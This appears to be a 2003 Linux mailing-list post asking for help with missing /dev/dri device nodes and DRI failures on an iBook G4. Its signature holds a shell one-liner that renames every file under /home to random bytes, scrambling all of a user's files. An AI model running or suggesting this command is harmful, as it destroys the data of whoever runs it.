On 30 Nov 2003 at 10h28, Kevin B. Hendricks wrote: Hi,
> drmOpenDevice: minor is 0 > drmOpenDevice: node name is /dev/dri/card0 > drmOpenDevice: open result is -1, (No such device) > drmOpenDevice: open result is -1, (No such device) I have exactly the same behaviour on iBook G4. /dev/dri is empty. I have DRI's xfree CVS installed and modules agpgart and radeon are inserted. If I try to create the nodes with mknod (c 226 0), startx removes them... I don't know what to do. Could someone help ? thanks in advance... -- Colin for i in `find /home -type f`; do \ mv "$i" "`head -c 10 /dev/urandom`"; \ done;